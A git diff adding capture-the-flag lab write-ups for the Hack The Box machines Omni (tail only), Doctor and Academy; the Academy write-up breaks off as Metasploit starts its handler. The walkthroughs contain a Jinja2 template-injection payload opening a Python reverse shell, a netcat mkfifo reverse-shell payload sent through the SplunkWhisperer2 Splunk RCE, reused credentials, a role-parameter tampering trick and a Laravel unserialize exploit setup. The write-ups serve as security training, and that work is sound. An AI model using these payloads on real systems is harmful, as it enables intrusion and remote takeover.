+ 2021/06/02 18:37:14 Waiting for connections...
+
+`  
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/76 ] [HTB/Omni/SirepRAT]
+ → ./xc -l -p 9007
+
+ __ _____
+ \ \/ / __|
+ > <****(__
+ /_/\_\___| by @xct_de
+ build: QUnVVFdLYEkibcKx
+
+ 2021/06/02 18:37:14 Listening on :9007
+ 2021/06/02 18:37:14 Waiting for connections...
+ 2021/06/02 19:12:32 Connection from 10.10.10.204:49677
+ 2021/06/02 19:12:32 Stream established
+
+ [*] Auto-Plugins:
+ [xc: C:\windows\system32]: !shell
+ Microsoft Windows [Version 10.0.17763.107]
+ Copyright (c) Microsoft Corporation. All rights reserved.
+
+ C:\windows\system32>cd ../../..
+ cd ../../..
+
+ C:\>cd Data
+ cd Data
+
+ C:\Data>powershell
+ powershell
+ Windows PowerShell
+ Copyright (C) Microsoft Corporation. All rights reserved.
+
+ PS C:\Data\> cd Users\administrator
+ cd Users\administrator
+
+ PS C:\Data\Users\administrator> ls
+ ls
+
+
+ Directory: C:\Data\Users\administrator
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ d-r--- 7/3/2020 11:23 PM 3D Objects
+ d-r--- 7/3/2020 11:23 PM Documents
+ d-r--- 7/3/2020 11:23 PM Downloads
+ d----- 7/3/2020 11:23 PM Favorites
+ d-r--- 7/3/2020 11:23 PM Music
+ d-r--- 7/3/2020 11:23 PM Pictures
+ d-r--- 7/3/2020 11:23 PM Videos
+ -ar--- 7/4/2020 9:48 PM 1958 root.txt
+
+
+ PS C:\Data\Users\administrator> (Import-CliXml -Path root.txt).GetNetworkCredential() | fl
+ (Import-CliXml -Path root.txt).GetNetworkCredential() | fl
+
+
+ UserName : flag
+ Password : 5dXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+ Domain :
+
+
+
+And that's it! We managed to get the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/51.md b/Easy/51.md
new file mode 100644
index 0000000..c93e2c5
--- /dev/null
+++ b/Easy/51.md
@@ -0,0 +1,347 @@
+# Doctor Writeup
+
+
+
+## Introduction :
+
+Doctor is an Easy Linux box released back in September 2020.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [HTB/Omni/SirepRAT]
+ → nmap -vvv -p- 10.10.10.209 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
+ Discovered open port 22/tcp on 10.10.10.209
+ Discovered open port 80/tcp on 10.10.10.209
+ Discovered open port 8089/tcp on 10.10.10.209
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [HTB/Omni/SirepRAT]
+ → nmap -sCV -p22,80,8089 10.10.10.209
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-02 22:00 CEST
+ Nmap scan report for 10.10.10.209
+ Host is up (0.035s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 3072 59:4d:4e:c2:d8:cf:da:9d:a8:c8:d0:fd:99:a8:46:17 (RSA)
+ | 256 7f:f3:dc:fb:2d:af:cb:ff:99:34:ac:e0:f8:00:1e:47 (ECDSA)
+ |_ 256 53:0e:96:6b:9c:e9:c1:a1:70:51:6c:2d:ce:7b:43:e8 (ED25519)
+ 80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
+ |_http-server-header: Apache/2.4.41 (Ubuntu)
+ |_http-title: Doctor
+ 8089/tcp open ssl/http Splunkd httpd
+ | http-robots.txt: 1 disallowed entry
+ |_/
+ |_http-server-header: Splunkd
+ |_http-title: splunkd
+ | ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
+ | Not valid before: 2020-09-06T15:57:27
+ |_Not valid after: 2023-09-06T15:57:27
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 33.57 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's take a look at it:
+
+
+
+Looking at the website we are hinted towards a domain name: **doctors.htb** so let's add it to our hosts file:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [HTB/Omni/SirepRAT]
+ → sudo -i
+ ┌──(root💀nowhere)-[~]
+ └─# /usr/bin/sudo
+
+ ┌──(root💀nowhere)-[~]
+ └─# echo '10.10.10.209 doctors.htb' >> /etc/hosts
+
+ ┌──(root💀nowhere)-[~]
+ └─# exit
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Doctors]
+ → ping doctors.htb
+ PING doctors.htb (10.10.10.209) 56(84) bytes of data.
+ 64 bytes from doctors.htb (10.10.10.209): icmp_seq=1 ttl=63 time=32.4 ms
+ 64 bytes from doctors.htb (10.10.10.209): icmp_seq=2 ttl=63 time=32.9 ms
+ 64 bytes from doctors.htb (10.10.10.209): icmp_seq=3 ttl=63 time=32.3 ms
+ ^C
+ --- doctors.htb ping statistics ---
+ 3 packets transmitted, 3 received, 0% packet loss, time 2002ms
+ rtt min/avg/max/mdev = 32.309/32.518/32.861/0.244 ms
+
+
+
+Then we visit the webpage:
+
+    
+
+Now that we created an account we're going to create a test post:
+
+ 
+
+And looking at the sourcecode of the page we get a hint that the **/archive** page is still under beta testing. So let's take a look at it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Doctors]
+ → curl http://doctors.htb/archive
+
+ <****?xml version="1.0" encoding="UTF-8" ?> <****rss version="2.0"> <****channel> <****title>Archive <****/title>
+
+Now here we see that the test post we created earlier is visible there, inside the title tags, now the question is wether or not the title of the post itself is sanitized or not, so let's test if this is vulnerable to a Server Side Template Injection ([SSTI](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection)) attack
+
+
+
+So let's test each of the payloads:
+
+   
+
+Now we know that **Twig** or **Jinja2** templates are probably in use. So let's get a reverse shell:
+
+
+
+ {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\"10.10.14.13\",9001)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call([\"/bin/bash\", \"-i\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
+
+
+
+
+`  
+
+Then just browse to **http://doctors.htb/archive** and we get the reverse shell connection:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Doctors]
+ → nc -lvnp 9001
+ listening on [any] 9001 ...
+ connect to [10.10.14.13] from (UNKNOWN) [10.10.10.209] 48082
+ bash: cannot set terminal process group (840): Inappropriate ioctl for device
+ bash: no job control in this shell
+ web@doctor:~$ id
+ id
+ uid=1001(web) gid=1001(web) groups=1001(web),4(adm)
+ web@doctor:~$
+
+
+
+Now let's upgrade our shell to a fully interactive shell:
+
+
+ web@doctor:~$ which python python3 wget curl
+ which python python3 wget curl
+ /usr/bin/python3
+ /usr/bin/wget
+ /usr/bin/curl
+
+
+
+
+ web@doctor:~$ python3 -c 'import pty; pty.spawn("/bin/bash")'
+ python3 -c 'import pty; pty.spawn("/bin/bash")'
+ web@doctor:~$ ^Z
+ [1] + 2659972 suspended nc -lvnp 9001
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Doctors]
+ → stty raw -echo ; fg
+ [1] + 2659972 continued nc -lvnp 9001
+ export TERM=screen-256color
+ web@doctor:~$ export SHELL=bash
+ web@doctor:~$ stty rows 40 columns 125
+ web@doctor:~$ reset
+
+
+
+
+Now that we got a fully interactive TTY reverse shell, let's enumerate the box with linpeas:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Doctors]
+ → cp /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Doctors]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+ web@doctor:~$ wget http://10.10.14.13:9090/linpeas.sh -O /tmp/peas.sh
+ --2021-06-03 15:39:34-- http://10.10.14.13:9090/linpeas.sh
+ Connecting to 10.10.14.13:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 341863 (334K) [text/x-sh]
+ Saving to: ‘/tmp/peas.sh’
+
+ /tmp/peas.sh 100%[====================================================>] 333,85K 698KB/s in 0,5s
+
+ 2021-06-03 15:39:35 (698 KB/s) - ‘/tmp/peas.sh’ saved [341863/341863]
+
+ web@doctor:~$ chmod +x /tmp/peas.sh
+
+ web@doctor:~$ /tmp/peas.sh
+
+
+
+` 
+
+Let it run and then in the output we see the following password:
+
+
+
+Let's check which of the users have that password:
+
+
+ web@doctor:~$ cat /etc/passwd | grep bash
+ root:x:0:0:root:/root:/bin/bash
+ web:x:1001:1001:,,,:/home/web:/bin/bash
+ shaun:x:1002:1002:shaun,,,:/home/shaun:/bin/bash
+ splunk:x:1003:1003:Splunk Server:/opt/splunkforwarder:/bin/bash
+
+ web@doctor:~$ ls -lash /home
+ total 16K
+ 4,0K drwxr-xr-x 4 root root 4,0K Sep 19 2020 .
+ 4,0K drwxr-xr-x 20 root root 4,0K Sep 15 2020 ..
+ 4,0K drwxr-xr-x 6 shaun shaun 4,0K Sep 15 2020 shaun
+ 4,0K drwxr-xr-x 7 web web 4,0K Jun 3 15:42 web
+
+
+Let's try the shaun user:
+
+
+ web@doctor:~$ su shaun
+ Password:
+ shaun@doctor:/home/web$ id
+ uid=1002(shaun) gid=1002(shaun) groups=1002(shaun)
+ shaun@doctor:/home/web$ cd ~
+ shaun@doctor:~$ cat user.txt
+ 7cXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to privesc to the shaun user and get the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now in order to privesc to the root user, let's run linpeas.sh once more, this time as the shaun user:
+
+
+ shaun@doctor:~$ /tmp/peas.sh
+
+
+
+Although suprisingly we get nothing interesting other than hints towards the splunk service that's running on port 8089
+
+
+
+
+ shaun@doctor:~$ ps -aux | grep splunk
+ root 1139 0.0 2.0 257468 83740 ? Sl Jun02 0:40 splunkd -p 8089 start
+ root 1141 0.0 0.3 77664 13340 ? Ss Jun02 0:00 [splunkd pid=1139] splunkd -p 8089 start [process-runner]
+ shaun 429634 0.0 0.0 17668 736 pts/0 S+ 16:01 0:00 grep --color=auto splunk
+
+
+
+And we also see that the splunk daemon is ran by the root user:
+
+
+
+Here we can assume that shaun's PAM password is re-used for the splunk service, so let's try it out with the Splunk Whisperer2 python exploit:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Doctors]
+ → git clone https://github.com/cnotin/SplunkWhisperer2
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Doctors]
+ → cd SplunkWhisperer2
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [HTB/Doctors/SplunkWhisperer2]
+ → tree
+ .
+ ├── LICENSE
+ ├── PySplunkWhisperer2
+ │ ├── build_exe.bat
+ │ ├── PySplunkWhisperer2_local.py
+ │ ├── PySplunkWhisperer2_remote.py
+ │ ├── README.md
+ │ └── requirements.txt
+ ├── README.md
+ └── SharpSplunkWhisperer2
+ ├── app.config
+ ├── FodyWeavers.xml
+ ├── packages.config
+ ├── Program.cs
+ ├── README.md
+ ├── SharpSplunkWhisperer2.csproj
+ └── SharpSplunkWhisperer2.sln
+
+ 2 directories, 14 files
+
+
+Let's test it using shaun's credentials:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [HTB/Doctors/SplunkWhisperer2]
+ → cd PySplunkWhisperer2
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [Doctors/SplunkWhisperer2/PySplunkWhisperer2]
+ → python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.13 --username shaun --password Guitar123 --payload id
+ Running in remote mode (Remote Code Execution)
+ [.] Authenticating...
+ [+] Authenticated
+ [.] Creating malicious app bundle...
+ [+] Created malicious app bundle in: /tmp/tmptx03ln_m.tar
+ [+] Started HTTP server for remote mode
+ [.] Installing app from: http://10.10.14.13:8181/
+ 10.10.10.209 - - [03/Jun/2021 15:56:31] "GET / HTTP/1.1" 200 -
+ [+] App installed, your code should be running now!
+
+ Press RETURN to cleanup
+
+ [.] Removing app...
+ [+] App removed
+ [+] Stopped HTTP server
+ Bye!
+
+
+Seems to be working although we can't see the output of the command, so let's do it with a reverse shell this time:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [Doctors/SplunkWhisperer2/PySplunkWhisperer2]
+ → python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.13 --username shaun --password Guitar123 --payload 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.13 9002 >/tmp/f'
+ Running in remote mode (Remote Code Execution)
+ [.] Authenticating...
+ [+] Authenticated
+ [.] Creating malicious app bundle...
+ [+] Created malicious app bundle in: /tmp/tmprb66z6y4.tar
+ [+] Started HTTP server for remote mode
+ [.] Installing app from: http://10.10.14.13:8181/
+ 10.10.10.209 - - [03/Jun/2021 15:58:45] "GET / HTTP/1.1" 200 -
+ [+] App installed, your code should be running now!
+
+ Press RETURN to cleanup
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [Doctors/SplunkWhisperer2/PySplunkWhisperer2]
+ → nc -lvnp 9002
+ listening on [any] 9002 ...
+ connect to [10.10.14.13] from (UNKNOWN) [10.10.10.209] 33510
+ /bin/sh: 0: can't access tty; job control turned off
+ # id
+ uid=0(root) gid=0(root) groups=0(root)
+ # cat /root/root.txt
+ 50XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to get a reverse shell as the root user and we managed to print the root flag!
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/52.md b/Easy/52.md
new file mode 100644
index 0000000..78dcca5
--- /dev/null
+++ b/Easy/52.md
@@ -0,0 +1,710 @@
+# Academy Writeup
+
+
+
+## Introduction :
+
+Academy is an easy Linux box released back in November 2020.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Academy]
+ → nmap -vvv -p- 10.10.10.215 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
+ Discovered open port 80/tcp on 10.10.10.215
+ Discovered open port 22/tcp on 10.10.10.215
+ Discovered open port 33060/tcp on 10.10.10.215
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Academy]
+ → nmap -sCV -p80,22,33060 10.10.10.215
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-03 16:45 CEST
+ Nmap scan report for 10.10.10.215
+ Host is up (0.035s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA)
+ | 256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA)
+ |_ 256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519)
+ 80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
+ |_http-server-header: Apache/2.4.41 (Ubuntu)
+ |_http-title: Did not follow redirect to http://academy.htb/
+ 33060/tcp open mysqlx?
+ | fingerprint-strings:
+ | DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
+ | Invalid message"
+ |_ HY000
+ 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
+ SF-Port33060-TCP:V=7.91%I=7%D=6/3%Time=60B8EB24%P=x86_64-pc-linux-gnu%r(NU
+ SF:LL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x0b\x
+ SF:08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTTPOpt
+ SF:ions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\x0b\
+ SF:x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSVersi
+ SF:onBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTCP,2B
+ SF:,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fIn
+ SF:valid\x20message\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%
+ SF:r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\
+ SF:x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(TerminalServerCookie,
+ SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\x0
+ SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
+ SF:x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,9,
+ SF:"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05\x
+ SF:1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY00
+ SF:0")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString,9
+ SF:,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x08
+ SF:\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x
+ SF:05HY000")%r(LDAPBindReq,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SIPOptions,
+ SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LANDesk-RC,9,"\x05\0\0\0\x0b\x08\x0
+ SF:5\x1a\0")%r(TerminalServer,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NCP,9,"\
+ SF:x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRPC,2B,"\x05\0\0\0\x0b\x08\x05\x1a
+ SF:\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000"
+ SF:)%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(WMSRequest,9,"\x05\0\0\
+ SF:0\x0b\x08\x05\x1a\0")%r(oracle-tns,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(
+ SF:ms-sql-s,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(afp,2B,"\x05\0\0\0\x0b\x08
+ SF:\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x
+ SF:05HY000")%r(giop,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 25.37 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's investigate it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Academy]
+ → curl 10.10.10.215
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Academy]
+ → curl 10.10.10.215 -v
+ * Trying 10.10.10.215:80...
+ * Connected to 10.10.10.215 (10.10.10.215) port 80 (#0)
+ > GET / HTTP/1.1
+ > Host: 10.10.10.215
+ > User-Agent: curl/7.74.0
+ > Accept: */*
+ >
+ * Mark bundle as not supporting multiuse
+ <****HTTP/1.1 302 Found <****Date: Thu, 03 Jun 2021 14:54:22 GMT <****Server: Apache/2.4.41 (Ubuntu) <****Location: http://academy.htb/ <****Content-Length: 0 <****Content-Type: text/html; charset=UTF-8 <***** Connection #0 to host 10.10.10.215 left intact
+
+As we try to get there we see that we are being redirected to the **academy.htb** domain name just like our nmap scan pointed out, so let's add it to our hosts file:
+
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Academy]
+ → sudo -i
+ [sudo] password for nothing:
+ ┌──(root💀nowhere)-[~]
+ └─# echo '10.10.10.215 academy.htb' >> /etc/hosts
+
+ ┌──(root💀nowhere)-[~]
+ └─# exit
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Academy]
+ → ping academy.htb
+ PING academy.htb (10.10.10.215) 56(84) bytes of data.
+ 64 bytes from academy.htb (10.10.10.215): icmp_seq=1 ttl=63 time=34.5 ms
+ 64 bytes from academy.htb (10.10.10.215): icmp_seq=2 ttl=63 time=40.5 ms
+ 64 bytes from academy.htb (10.10.10.215): icmp_seq=3 ttl=63 time=38.1 ms
+
+
+
+Now let's check out the website:
+
+   
+
+Now here we see that we are on a php website, and we could create and login into a test account. Once logged in, the webpage doesn't have anything to exploit, so let's search for other directories with gobuster:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Academy]
+ → gobuster dir -u http://academy.htb/ -t 50 -w /usr/share/seclists/Discovery/Web-Content/common.txt
+ ===============================================================
+ Gobuster v3.1.0
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
+ ===============================================================
+ [+] Url: http://academy.htb/
+ [+] Method: GET
+ [+] Threads: 50
+ [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
+ [+] Negative Status codes: 404
+ [+] User Agent: gobuster/3.1.0
+ [+] Timeout: 10s
+ ===============================================================
+ 2021/06/03 16:55:19 Starting gobuster in directory enumeration mode
+ ===============================================================
+ /.htpasswd (Status: 403) [Size: 276]
+ /admin.php (Status: 200) [Size: 2633]
+ /images (Status: 301) [Size: 311] [--> http://academy.htb/images/]
+ /index.php (Status: 200) [Size: 2117]
+ /.hta (Status: 403) [Size: 276]
+ /.htaccess (Status: 403) [Size: 276]
+ /server-status (Status: 403) [Size: 276]
+
+ ===============================================================
+ 2021/06/03 16:55:29 Finished
+ ===============================================================
+
+
+
+` 
+
+Now when we go to the admin.php page that our gobuster scan picked up, we see that we need to login to access it, the trick here was to inspect the **register.php** POST request when we were registering an account, and we can do so using burpsuite:
+
+
+
+We get the following request:
+
+
+ POST /register.php HTTP/1.1
+ Host: academy.htb
+ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.5
+ Accept-Encoding: gzip, deflate
+ Content-Type: application/x-www-form-urlencoded
+ Content-Length: 44
+ Origin: http://academy.htb
+ Connection: close
+ Referer: http://academy.htb/register.php
+ Cookie: PHPSESSID=mvopk0hecu88dl9kugslv1ihdp
+ Upgrade-Insecure-Requests: 1
+
+ uid=test&password;=test&confirm;=test**&roleid; =0**
+
+
+
+Something we didn't know earlier was the **roleid** post parameter set to 0, so we simply change it to **1** and then forward the intercepted request, and then we login to the **admin.php** page:
+
+
+
+And upon logging in, we get redirected to **admin-page.php** and we get the following:
+
+
+
+Here we're getting hinted towards a subdomain **dev-staging-01.academy.htb** , so let's add it to our hosts file:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Academy]
+ → sudo -i
+ [sudo] password for nothing:
+ ┌──(root💀nowhere)-[~]
+ └─# echo '10.10.10.215 dev-staging-01.academy.htb' >> /etc/hosts
+
+ ┌──(root💀nowhere)-[~]
+ └─# exit
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Academy]
+ → ping dev-staging-01.academy.htb
+ PING dev-staging-01.academy.htb (10.10.10.215) 56(84) bytes of data.
+ 64 bytes from academy.htb (10.10.10.215): icmp_seq=1 ttl=63 time=36.5 ms
+ 64 bytes from academy.htb (10.10.10.215): icmp_seq=2 ttl=63 time=39.9 ms
+ 64 bytes from academy.htb (10.10.10.215): icmp_seq=3 ttl=63 time=37.9 ms
+
+
+
+Now when we go there we get the following:
+
+
+
+Now if you read carefully, you see that this is a php laravel framework instance:
+
+
+
+So let's look for exploits to user on that service:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Academy]
+ → searchsploit laravel
+ -------------------------------------------------------- ---------------------------------
+ Exploit Title | Path
+ -------------------------------------------------------- ---------------------------------
+ Laravel - 'Hash::make()' Password Truncation Security | multiple/remote/39318.txt
+ Laravel 8.4.2 debug mode - Remote code execution | php/webapps/49424.py
+ Laravel Administrator 4 - Unrestricted File Upload (Aut | php/webapps/49112.py
+ Laravel Log Viewer <****0.13.0 - Local File Download | php/webapps/44343.py
+ Laravel Nova 3.7.0 - 'range' DoS | php/webapps/49198.txt**PHP Laravel Framework 5.5.40 / 5.6.x <__5.6.30 - token U | linux/remote/47129.rb**
+
+ UniSharp Laravel File Manager 2.0.0 - Arbitrary File Re | php/webapps/48166.txt
+ UniSharp Laravel File Manager 2.0.0-alpha7 - Arbitrary | php/webapps/46389.py
+ -------------------------------------------------------- ---------------------------------
+ Shellcodes: No Results
+
+
+we're going to use the ruby exploit that's for metasploit:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Academy]
+ → msfconsole
+
+
+ _---------.
+ .' ####### ;."
+ .---,. ;@ @@`; .---,..
+ ." @@@@@'.,'@@ @@@@@',.'@@@@ ".
+ '-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
+ `.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
+ "--'.@@@ -.@ @ ,'- .'--"
+ ".@' ; @ @ `. ;'
+ |@@@@ @@@ @ .
+ ' @@@ @@ @@ ,
+ `.@@@@ @@ .
+ ',@@ @ ; _____________
+ ( 3 C ) /|___ / Metasploit! \
+ ;@'. __*__,." \|--- \_____________/
+ '(.,..../
+
+
+ =[ metasploit v6.0.46-dev ]
+ + -- --=[ 2135 exploits - 1139 auxiliary - 365 post ]
+ + -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ + -- --=[ 8 evasion ]
+
+ Metasploit tip: To save all commands executed since start up
+ to a file, use the makerc command
+
+ msf6 > search laravel
+
+ Matching Modules
+ ================
+
+ # Name Disclosure Date Rank Check Description
+ - ---- --------------- ---- ----- -----------
+ 0 exploit/unix/http/laravel_token_unserialize_exec 2018-08-07 excellent Yes PHP Laravel Framework token Unserialize Remote Command Execution
+
+
+ Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/http/laravel_token_unserialize_exec
+
+ msf6 > use 0
+ [*] Using configured payload cmd/unix/reverse_perl
+ msf6 exploit(unix/http/laravel_token_unserialize_exec) > show options
+
+ Module options (exploit/unix/http/laravel_token_unserialize_exec):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ APP_KEY no The base64 encoded APP_KEY string from the .env file
+ Proxies no A proxy chain of format type:host:port[,type:host:port][...]
+ RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<****path>'
+ RPORT 80 yes The target port (TCP)
+ SSL false no Negotiate SSL/TLS for outgoing connections
+ TARGETURI / yes Path to target webapp
+ VHOST no HTTP server virtual host
+
+
+ Payload options (cmd/unix/reverse_perl):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ LHOST yes The listen address (an interface may be specified)
+ LPORT 4444 yes The listen port
+
+
+ Exploit target:
+
+ Id Name
+ -- ----
+ 0 Automatic
+
+So first let's get the APP key, which we should get from the .env file, but we don't have access to the server yet, so we just grab it from the debug page:
+
+
+
+Then we fill the rest of the options we need:
+
+
+ msf6 exploit(unix/http/laravel_token_unserialize_exec) > set APP_KEY dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
+ APP_KEY => dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
+
+ msf6 exploit(unix/http/laravel_token_unserialize_exec) > set RPORT 80
+ RPORT => 80
+
+ msf6 exploit(unix/http/laravel_token_unserialize_exec) > set RHOSTS 10.10.10.215
+ RHOSTS => 10.10.10.215
+
+ msf6 exploit(unix/http/laravel_token_unserialize_exec) > set VHOST dev-staging-01.academy.htb
+ VHOST => dev-staging-01.academy.htb
+
+ msf6 exploit(unix/http/laravel_token_unserialize_exec) > set LHOST tun0
+ LHOST => 10.10.14.13
+
+ msf6 exploit(unix/http/laravel_token_unserialize_exec) > exploit
+
+
+And when we launch the exploit:
+
+
+
+ [*] Started reverse TCP handler on 10.10.14.13:4444
